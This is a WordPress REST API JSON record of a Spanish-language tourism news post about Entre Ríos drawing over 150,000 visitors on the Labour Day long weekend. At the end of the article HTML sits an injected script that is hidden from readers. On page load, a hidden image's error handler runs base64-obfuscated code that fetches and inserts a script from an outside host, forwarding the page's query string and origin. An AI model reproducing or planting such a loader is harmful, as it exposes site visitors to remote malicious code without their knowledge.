{"id":6713,"date":"2023-05-03T20:46:27","date_gmt":"2023-05-03T23:46:27","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6713"},"modified":"2025-08-13T16:00:58","modified_gmt":"2025-08-13T19:00:58","slug":"entre-rios-tuvo-otro-exitoso-movimiento-turistico-el-pasado-fin-de-semana","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6713","title":{"rendered":"Entre R\u00edos tuvo otro exitoso movimiento tur\u00edstico el pasado fin de semana"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-black-color has-light-green-cyan-background-color has-text-color has-background\"><em>Este fin de semana la provincia recibi\u00f3 m\u00e1s de 150.000 visitantes que disfrutaron de termas, actividades en la naturaleza y ferias, entre otros atractivos, destac\u00e1ndose la fecha del TC que se concret\u00f3 en Concepci\u00f3n del Uruguay. La ocupaci\u00f3n promedio alcanz\u00f3 el 75 por ciento<\/em><\/h4>\n\n\n\n<p>Por el feriado del D\u00eda del Trabajador la provincia de Entre R\u00edos volvi\u00f3 a concitar la atracci\u00f3n de millas de turistas de diferentes lugares del pa\u00eds y tambi\u00e9n de la Rep\u00fablica Oriental del Uruguay, consolid\u00e1ndose como uno de los destinos m\u00e1s elegidos de Argentina.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-6698\" width=\"404\" height=\"201\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-324x160.jpg 324w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 404px) 100vw, 404px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Hubo una alta ocupaci\u00f3n de alojamientos, que alcanz\u00f3 el 75 por ciento en promedio, y se estiman ingresos por 2,8 millones de pesos por el movimiento econ\u00f3mico que genera los visitantes calculados en 8.500 pesos de gasto diario cada uno.<\/p>\n\n\n\n<p>A los cl\u00e1sicos atractivos que presenta la provincia en las diferentes localidades, como las termas, ferias y otros eventos, se sum\u00f3 este fin de semana la realizaci\u00f3n de la prueba de Turismo Carretera que cumpli\u00f3 la nueva fecha del calendario en el aut\u00f3dromo de la ciudad de Concepci\u00f3n del Uruguay.<\/p>\n\n\n\n<p>A Entre R\u00edos por su cercan\u00eda con los grandes centros poblados y la oferta de productos, atractivos y servicios vigentes en esta temporada, ingresa una multitud de visitantes dispuestos a recrearse oa descansar.<\/p>\n\n\n\n<p>El clima \u00f3ptimo favoreci\u00f3 la llegada de millas de visitantes argentinos con y sin reserva previa, y tambi\u00e9n del vecino pa\u00eds del Uruguay, lo que sigui\u00f3 una vez m\u00e1s un exitoso fin de semana largo para la provincia que contin\u00faa siendo uno de los principales destinos del pa\u00eds.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_20-4-2023_11329_www.entrerios.tur_.ar_.jpeg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_20-4-2023_11329_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-6670\" width=\"214\" height=\"55\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_20-4-2023_11329_www.entrerios.tur_.ar_.jpeg 443w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_20-4-2023_11329_www.entrerios.tur_.ar_-300x77.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Captura-web_20-4-2023_11329_www.entrerios.tur_.ar_-320x82.jpeg 320w\" sizes=\"(max-width: 214px) 100vw, 214px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este fin de semana la provincia recibi\u00f3 m\u00e1s de 150.000 visitantes que disfrutaron de termas, actividades en la naturaleza y ferias, entre otros atractivos, destac\u00e1ndose la fecha del TC que se concret\u00f3 en Concepci\u00f3n del Uruguay. La ocupaci\u00f3n promedio alcanz\u00f3 el 75 por ciento Por el feriado del D\u00eda del Trabajador la provincia de Entre [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6714,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-6713","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6713"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6713\/revisions"}],"predecessor-version":[{"id":10411,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6713\/revisions\/10411"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6714"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}